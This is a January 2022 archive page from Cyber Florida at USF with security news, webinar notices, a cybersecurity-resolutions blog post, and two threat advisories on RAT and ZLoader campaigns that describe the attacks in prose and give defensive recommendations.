Monthly Archives: January 2022

FIU Study Shows Men Were Twice As Likely to Be Targeted by Online Sex Blackmailing During Pandemic

According to a recent study conducted by Florida International University and the Cyber Civil Rights Initiative (CCRI), men were twice as likely as women to fall victim to the cyber-enabled crime known as “sextortion” during the pandemic.

Also known as online sex blackmailing, this cybercrime is a form of extortion in which the blackmailer threatens to publish explicit private images or videos online unless their demands are met. The survey of more than 2,000 U.S. adults showed that young people, Black and Native American women, and LGBTQ individuals were also at higher risk of being targeted.

READ MORE
2022-01-31T17:45:36-05:00January 31, 2022|
Read More

Episode 21: Chase Fopiano – a kindhearted former police officer who embodies all the qualities of a great leader

Episode 21: Chase Fopiano - a kindhearted former police officer who embodies all the qualities of a great leader

Chase Fopiano is the Founder of CyberTech Analytics, a cybersecurity provider that combines the worlds of both law enforcement and information security. Chase began his career as a police officer before diving headfirst into the cybersecurity world, and has since carried the lessons he learned during that time into both his life and his career. In this episode, Chase joins the No Password Required team to talk about the moment he decided to make the change to cybersecurity, his passion for learning and how it has helped him succeed, and why Yoda is the character he most relates to in life. Ernie, Jack, and Pablo discuss the cybercrime gang FIN7 and their recent attacks using malicious USB sticks designed to deliver ransomware. In the new Technologue segment, Pablo discusses the Voldemort of cyber-vulnerabilities, Log4j.

2022-01-28T13:42:52-05:00January 28, 2022|
Read More

UCF Study Shows 2/3 of Employees Neglect Cyber Policies

A recent study conducted by UCF researchers on insider threats in remote work places shows that employee apathy towards security policies may be partially to blame for the drastic increase in attacks against remote workers in recent years. According to results from the study, two-thirds of employees admitted to failing to fully adhere to cybersecurity policies at their companies.

READ MORE!
2022-01-26T19:57:27-05:00January 26, 2022|
Read More

UCF Study Shows 2/3 of Employees Neglect Cyber Policies

In the past two years, cybersecurity threats against remote work forces have risen drastically, and employee apathy towards security policies may be partially to blame. Researchers Clay Posey and Mindy Shoss from the University of Central Florida (UCF) interviewed and researched 330 remote workers and found that two-thirds of employees admitted to failing to fully adhere to cybersecurity policies at their company at least once every 10 workdays. When asked why they didn’t follow security policies, a majority of respondents answered that they ignored policies to better accomplish tasks for their jobs or help others get their work done. In fact, employees had malicious intent in only 3% of incidents where cybersecurity rules were broken.

According to CIODive, it is becoming more common for bad actors to approach employees to aid in an attack. Nearly two-thirds of IT and security professionals say their employees have been “approached to assist in aiding ransomware attacks,” while only half of respondents claimed to feel moderately prepared to prevent a ransomware attack.

READ MORE
2022-01-26T19:07:18-05:00January 26, 2022|
Read More

Amazon, Azure, Clouds Host RAT-ty Trio in Info-stealing Campaign

I. Targeted Entities

  • Amazon Web Services
  • Azure Cloud Services

II. Introduction

Cybercriminals are taking advantage of Amazon Web Services (AWS) and Azure Cloud services to deliver a trio of remote access trojans (RATs), all aimed to collect sensitive information from select users. According to researchers at Cisco Talos, threat actors have been distributing variants of the malware known as AsyncRAT, Netwire, and Nanocore since October 2020, mainly to targets in Italy, Singapore, South Korea, Spain, and the United States.

III. Background Information

The attacks start with a phishing email containing a malicious .zip attachment, but the criminals also have a cloud-based trick that can be used: “the .zip archive files contain an ISO image with a malicious loader in the form of JavaScript a Windows batch file or Visual Basic script. When the initial script is executed on the victim’s machine, it connects to a download server to download the next stage, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance,” says Talos researchers.[1]

Researchers say that using cloud services to host the payloads is a decision made in order to avoid detection while cutting the costs of the campaign since the attackers don’t have to set up their own infrastructure. It also makes it more difficult for defenders to track down the attackers. The threat actor behind this campaign maintains a distributed infrastructure consisting of download servers, command-and-control servers (C2s), and malicious subdomains, researchers said.[2] The download servers are hosted on Microsoft Azure and AWS. These well-known cloud services are used because of the inherent trust the public has with the well-known companies to be secure. Network defenders may think that communications to an IP address owned by Microsoft or Amazon are innocent because of the multitude of benign communications they frequently see across multiple services.

Further, the main JavaScript downloader used in this campaign uses a four-layer, complex obfuscation technique in its script. Researchers say, “Each stage of the deobfuscation process results with the decryption methods for the subsequent stages to finally arrive at the actual malicious downloader method. The deobfuscation process is performed at each stage with every next stage generated as the result of the previous stage deobfuscation function.”[2] The batch script has an obfuscated command that runs PowerShell to download and run a payload from a download server on Azure cloud. Obfuscated VB downloaders execute a PowerShell command, which runs and connects to the download server running on AWS EC2.[2] To avoid detection, the attackers use the DuckDNS dynamic DNS service to change the domain names of the C2 hosts. Talos researchers found that the threat actors have registered several malicious subdomains using the service.[2]

The RATs used in this campaign include:

  • AsyncRAT: used to remotely monitor and control computers through a secure, encrypted connection to a C2 server. It also contains a keylogger, screen recorder, and a system configuration manager, which allows the attacker to steal confidential data from the victim’s machine
  • NetwireRAT: a known threat used by attackers to steal victims’ passwords, login credentials, and credit card data. It can also remotely execute the commands and collect file-system information
  • Nanocore: a 32-bit .Net portable executable, which was first seen in 2013. The version used in this campaign contains two plugins, called Client and SurveillanceEX. Client, and handles the communications with the C2 server, and SurveillanceEX captures video and audio, as well as monitoring remote desktop activity.[2]

Talos researchers suggest that organizations deploy comprehensive multi-layered security controls to detect similar threats and safeguard their assets. “Defenders should monitor traffic to their organization and implement robust rules around the script execution policies on their endpoints. It is even more important for organizations to improve email security to detect and mitigate malicious email messages, and break the infection chain as early as possible.”

Miclain Keffeler, an application security consultant at nVisium, noted that the rise in the adoption of cloud technologies has forced a shift in security. But this shift means that cloud providers should also ensure that their systems are secure, saying that it is important for malicious usage of their services to be halted immediately when found. “These kinds of attacks aren’t going anywhere, so it’s important that cloud providers like AWS and Microsoft Azure step in to develop more processes around the notification of malicious use cases — especially given the complex nature of the current threatscape.”[2]

IV. MITRE ATT&CK

  • T1005 – Data From Local System
    Threat actors can search through local system sources such as local databases to find sensitive data prior to exfiltration.
  • T1063 – Security Software Discovery
    Attackers can become aware of which configurations, software, and sensors that are currently running in a system.
  • T1555 – Credentials From Password Stores
    Can retrieve passwords from mail and messaging applications.
  • T1105 – Ingress Tool Transfer
    Payload set to download from C2 onto the compromised host.
  • T1059 – Command and Scripting Interpreter
    Opens remote command-line interface and executes commands used in JavaScript files.

For more MITRE ATT&CKs, please confer the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Multi-layered Security Controls
    Creating a multi-layered security system entails that there are numerous components that shield multiple operational layers.
  • Enhance Email Security
    Increasing email security allows for the detection and mitigation of malicious emails.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/xlo3kyjeye6q44qk3jusm2n1xin9cf32

VII. References

(1) Raghuprasad, Chetan, and Vanja Svajcer. “Nanocore, Netwire and AsyncRAT Spreading Campaign Uses Public Cloud Infrastructure.” Cisco Talos Intelligence Group, January 12, 2022. https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html.

(2) Seals, Tara. “Amazon, Azure Clouds Host Rat-Ty Trio in Info-Stealing Campaign.” Threatpost English Global, January 12, 2022. https://threatpost.com/amazon-azure-clouds-rat-infostealing/177606/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

2022-01-25T15:34:09-05:00January 25, 2022|
Read More

The Evolving Threat of Ransomware

Watch the video of this presentation:


Cyber Florida invites IT managers to a free webinar on a prolific threat facing all organizations: ransomware. How has it evolved recently? What should you be doing as a technology leader to better protect your organization? Learn about the latest tactics employed by cybercriminals and some easy, affordable best practices you can implement right away to significantly reduce your organization’s risk.Speaker: Tyler Chancey, Cybersecurity Consultant, Scarlett Cybersecurity

What to Expect:

  • Newest attack trends in ransomware
  • Cutting-edge ransomware defense
  • Embracing a security-centric culture
  • Q&A

About the Speaker

Tyler Chancey is a University of Florida graduate currently acting as a Cybersecurity Consultant with Scarlett Cybersecurity. One of his core job responsibilities is evaluating and architecting cybersecurity solutions in order to facilitate a stronger security posture both internally and within client’s networks. Another duty of a Cybersecurity Consultant within Scarlett Cybersecurity is the rigorous assessment of new security solutions for internal and client use.

Tyler also acts in a sales-support capacity and as a team lead for Scarlett’s Cyber Incident Response Team. His previous roles include extensive experience as a Security Operations Center Intrusion Analyst with a Fortune 10 company. Tyler interacts both behind the scenes and directly with clients in order to help Scarlett Cybersecurity create optimal cybersecurity solutions.

His degree is a BS in Computer Science issued from UF’s Herbert Wertheim College of Engineering. Tyler currently holds the GIAC Certified Forensics Analyst (GCFA) certification issued by the SANS institute. Tyler also underwent the associated SANS course, FOR508, in order to obtain hands-on experience with forensic analysis and incident response. On a non-technical level, Tyler attended the 12-Week Dale Carnegie Breakthrough to Success course focused on improving professional and personal communication skills.

2022-04-01T12:32:34-04:00January 21, 2022|
Read More

5 Cybersecurity Resolutions to Make in 2022

As we enter a new year, it is important for each of us to understand our responsibility in preventing cyberattacks. If you’re looking to start 2022 off with a clean digital slate, check out our latest blog post! We talk about realistic cybersecurity resolutions that you can make in 2022 to begin the journey of being more cyber-secure.

READ NOW!
2022-01-14T15:03:05-05:00January 14, 2022|
Read More

Ransomware: Everything You Wanted to Know But Were Afraid to Ask


Join us for our upcoming webinar on Cybersecurity Awareness! This webinar will be focused on providing ransomware awareness training to a non-technical audience. Tips, examples, and best practices will be included for all participants. The slides will be provided on-demand post-presentation for future reference.Speaker: Tyler Chancey, Cybersecurity Consultant, Scarlett Cybersecurity

What to Expect:

  • Ransomware – How it Works and Trends
  • The Absolute Basics – Staying Safe
  • Commonly Asked Questions Regarding Ransomware
  • Q&A

About the Speaker

Tyler Chancey is a University of Florida graduate currently acting as a Cybersecurity Consultant with Scarlett Cybersecurity. One of his core job responsibilities is evaluating and architecting cybersecurity solutions in order to facilitate a stronger security posture both internally and within client’s networks. Another duty of a Cybersecurity Consultant within Scarlett Cybersecurity is the rigorous assessment of new security solutions for internal and client use.

Tyler also acts in a sales-support capacity and as a team lead for Scarlett’s Cyber Incident Response Team. His previous roles include extensive experience as a Security Operations Center Intrusion Analyst with a Fortune 10 company. Tyler interacts both behind the scenes and directly with clients in order to help Scarlett Cybersecurity create optimal cybersecurity solutions.

His degree is a BS in Computer Science issued from UF’s Herbert Wertheim College of Engineering. Tyler currently holds the GIAC Certified Forensics Analyst (GCFA) certification issued by the SANS institute. Tyler also underwent the associated SANS course, FOR508, in order to obtain hands-on experience with forensic analysis and incident response. On a non-technical level, Tyler attended the 12-Week Dale Carnegie Breakthrough to Success course focused on improving professional and personal communication skills.

2023-01-19T14:00:46-05:00January 14, 2022|
Read More

5 Cybersecurity Resolutions To Make in 2022

The past two years have witnessed a massive spike in cybercrime as the world turned to technology for work, school, grocery shopping, connecting, and practically everything else during the global pandemic. This sudden shift left many individuals and businesses scrambling to find a sense of normalcy in our new digitally dependent world; in response, cybercriminals quickly took advantage with mass phishing campaigns, new ransomware variants, and other sophisticated attacks designed to target unsuspecting and vulnerable victims.

As we enter a new year, it is important for each of us to understand our responsibility in preventing cyberattacks. Cybersecurity can undoubtedly be challenging, but it doesn’t have to be! If you are looking to start 2022 off with a clean digital slate, consider the following cybersecurity “resolutions” that you can implement now to begin the journey of being more cyber-secure.

5 Cybersecurity Resolutions for the New Year

1. Clean up your password lists


Passwords are the thing that protect your personal information from outside attacks. Imagine that you are the ruler of a village, and your enemies are making their way to attack. Would you employ a single guard to protect every building and person across the land? No! You would send out an army of guards, each with a specific post to protect to increase your chances of a successful defense.

Your passwords work in the same way. Each of your online accounts needs its own unique password to ensure that your personal information is protected from potential attacks. If you reuse the same password for every account, all your personal information is at risk in an instant if that password is exposed by a cybercriminal seeking to infiltrate your accounts. Using an individual unique password for each account helps ensure that even if one password is exposed, your other accounts will remain protected.

2. Don’t believe everything you see


The spread of misinformation and disinformation has increased drastically in the past two years as attackers take advantage of the COVID-19 pandemic, political news, and other widely-debated topics to create tension and chaos among the public. Misinformation and disinformation are often referred to as “fake news”, and although both words refer to types of wrong or false information, only disinformation is wrong on purpose and is deliberately intended to deceive. Unfortunately, as the world remains in the midst of the pandemic and the U.S. faces another election around the corner, it’s likely that 2022 will see yet another influx of misinformation and disinformation being spread across social media and beyond. 

As we navigate through the upcoming year, think twice before you share. Just because it’s online does not mean that it’s true; often, people will knowingly create sensational content just to get you to click. One of the best ways to avoid becoming a misinformation and disinformation superspreader is to consider the 5 Ws when faced with new information.  

Ask yourself: 

  • Who is posting this information? Are they a reliable source? If not, can you find other credible sources to back up the information? 
  • What does the information look like? Are there facts or additional sources or is it simply someone’s opinion?  
  • Why are they sharing this information? Is the purpose to make you think or feel a certain way? 
  • When was this information released? 
  • Where did the source of information come from? Is it a credible source who is close to the issue in other ways?

3. Remain vigilant against phishing attacks


Phishing is one of the most common cyberattacks that can seriously impact both individuals and organizations. The COVID-19 pandemic and other global topics have given cybercriminals more fuel to target victims in their schemes, taking advantage of these hot topics to craft relevant messages and trick people into clicking on malicious links. Phishing attacks are most often delivered via email, text, or carefully crafted websites, but these messages can also be delivered on social media through the persona of a fake profile.

One thing many phishing attacks have in common is a sense of urgency, pressuring you into taking immediate action to avoid consequences. Other warning signs of phishing attacks may include poor grammar, mismatched URLs, generic greetings, urgent language, or requests for personal or financial information. When in doubt, always navigate directly to the website in question to confirm that the claim is legitimate before clicking on any links or sharing any personal information.

4. Don’t overshare on social media


While social media may seem relatively harmless aside from the common troll, oversharing can put you at a greater risk of becoming victim to an attack. Seemingly harmless details in your profile, posts, and photos can give cybercriminals the information they need to commit identity fraud, theft, and other targeted attacks.

We’ve all seen posts on social media with captions like, “So happy to get out of town for the week! #livinglife” accompanied by pictures of fruity cocktails, family selfies, and away-from-home adventures. While we may see these posts and feel a little jealous, cybercriminals and thieves see them as a sign that your home is unoccupied and vulnerable for a week, potentially giving them the opportunity to target and theft your home.

Criminals are known to monitor social media to track victims and gather information about their daily routines. One of the dangers of oversharing on social media is that strangers not only know when you’re away on vacation; they can also get to know your daily schedule and when you’re going to be away. Whether you’re on vacation sharing live stories of your adventures or simply posting updates from your daily routine, oversharing this personal information can put you at serious risk of being targeted both on and off-screen.

Aside from monitoring the information that you post, be sure to check your social media profile settings to ensure that your personal information, posts, and photos are only viewable by people you know. Additionally, refrain from accepting friend requests from people you don’t know in real life; it’s possible that a cybercriminal is behind the screen with a fake profile.

5. Regularly update your software


How many times have you clicked “remind me later” when prompted to update your device software? We’ve all been there – procrastinating the 20-minute delay in our days until we are fed up with the constant reminders and finally give in.

While sometimes a nuisance, regularly updating your software is one of the best ways to protect your devices from a cyberattack. Not only do software updates fix bugs and improve overall function, but they also fix security weaknesses that make your device vulnerable, adding an added layer of security against prying eyes even when you aren’t near your device.

2022-10-27T10:06:30-04:00January 13, 2022|
Read More

Cybercriminal Group Exploits Microsoft’s E-Signature Verification

I. Targeted Entities

  • Online bank users

II. Introduction

An information-stealing campaign using ZLoader malware, which has been previously used to deliver other ransomware, has already claimed over 2,000 victims across more than 100 countries.

III. Background Information

Researchers at Check Point Research (CPR) discovered that the cybercriminal group “Malsmoke” has been taking advantage of Microsoft’s digital signature verification to steal user credentials and other sensitive information by delivering the ZLoader malware, which has also been used to distribute Ryuk and Conti ransomware in the past. (2) The threat actors have already claimed 2,170 victims in 111 countries, mainly in the U.S., Canada, and India.

ZLoader is a banking trojan that uses web injection to steal cookies, passwords, and other sensitive information from victims’ machines. (2) In September 2021, it caught the attention of the Cybersecurity Infrastructure and Security Agency (CISA) as a threat in the distribution of Conti and Ryuk ransomware. Attackers also used ZLoader as the delivery vehicle in multiple spearphishing campaigns, most notably at the beginning of the COVID-19 pandemic in March 2020. Again, in September of 2021, attackers spread ZLoader via Google AdWords in a campaign that used a tool to disable all Windows Defender modules on victims’ machines. (2)

This latest malware campaign by Malsmoke leverages Java in its attack vector, starting its illicit activity by installing a legitimate remote management program that acts as a Java installation. Once this happens, the attacker has full access to the victim machine and is able to upload and download files as well as run scripts. In time, attackers run a file called mshta.exe with the file appContast.dll as the parameter (which appears to be a Microsoft trusted file) to deliver the payload. CPR researchers say that appContast.dll is signed by Microsoft, even though extra information has been added to the end of the file. CPR researchers also say that, “the added information downloads and runs the final Zloader [sic] payload, stealing user credentials and private information from victims.”

Kobi Eisenkraft, a malware researcher at CPR, says that attackers have put in a great effort to evade detection. CPR has informed Microsoft and Altera, the maker of a remote management and monitoring tool, of their findings. CPR advises that Microsoft users apply Microsoft’s update for strict Authenticode verification immediately to avoid falling victim to the campaign. CPR also advised that people follow typical common-sense security practices to avoid installing programs from unknown sources, clicking on unfamiliar links, or opening unfamiliar attachments they receive in emails.

IV. MITRE ATT&CK

  • T1204 – User Execution
    ZLoader relies upon specific actions by a user in order to gain execution.
  • T1036 – Masquerading
    ZLoader attempts to manipulate features of their artifacts to make them appear legitimate or benign to users and security tools.
  • T1112 – Modify Registry
    ZLoader interacts with the Windows Registry to hide configuration information within Registry keys, and to aid in execution.
  • T1041 – Exfiltration Over C2 Channel
    ZLoader steals data by exfiltrating the data over an existing command and control server.

For more MITRE ATT&CKs, please confer the MITRE ATT&CK table in the attached CPR report: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/

V. Recommendations

  • Phishing Awareness Training
    Users should be informed and educated about new kinds of phishing scams currently being used and ones that have been used in the past. Awareness training should instruct users to avoid suspicious emails, links, websites, attachments, etc. Users should also be educated about new types of attacks and schemes to mitigate risk.
    Recommended link: https://www.us-cert.gov/ncas/tips/ST04-014
  • Set Antivirus Programs to Conduct Regular Scans
    Ensure that antivirus and anti-malware programs are scanning assets using up-to-date signatures.
  • Monitor Malware
    Continuously monitor current and new types of malware. Stay up to date on intel and advancements to prevent, defend, and mitigate these types of threats.
  • Implement Strong Cyber Hygiene
    Enforce a strong password policy across all networks and subsystems. Remind users to be wary of any messages asking for immediate attention, links, downloads, etc. All sources should be verified.
    Recommended link: https://us-cert.cisa.gov/ncas/alerts/aa21-131a
  • Turn on Endpoint Protection
    Enable endpoint detection and response (EDR) to stop unknown malware in the product you’re using.

VI. Indicators of Compromise (IOCs)

The link below has been included to assist with the download of some identified IOCs related to this Threat Advisory report. Be on the lookout for these IOCs, as well as anything that looks similar.

https://usf.box.com/s/etguhg3nrjxrag2km48awhxlvxlg6p81

VII. References

(1) Cohen, Golan. “Can You Trust a File’s Digital Signature? New Zloader Campaign Exploits Microsoft’s Signature Verification Putting Users at Risk.” Check Point Research, January 5, 2022. https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/.

(2) Montalbano, Elizabeth. “’Malsmoke’ Exploits Microsoft’s E-Signature Verification.” Threatpost English Global, January 5, 2022. https://threatpost.com/malsmoke-microsoft-e-signature-verification/177363/.

Threat Advisory created by The Cyber Florida Security Operations Center. Contributing Security Analysts: Dorian Pope, Ipsa Bhatt, Sreten Dedic, EJ Bulut, Uday Bilakhiya, Tural Hagverdiyev.

2022-01-10T15:50:16-05:00January 10, 2022|
Read More

Hosted by the University of South Florida
4202 E. Fowler Avenue, ISA7020
Tampa, FL 33620
outreach@cyberflorida.org
813-974-2604

Office meetings by appointment only

CONTACT US

PRIVACY POLICY

Copyright 2024 The Florida Center for Cybersecurity. Information on this website is made available for general educational purposes only and should not be used in lieu of obtaining competent legal advice from a licensed attorney or cybersecurity professional with sufficient expertise necessary to address your specific needs. Use of this website does not create any special or fiduciary relationship between you and the Florida Center for Cybersecurity or the University of South Florida.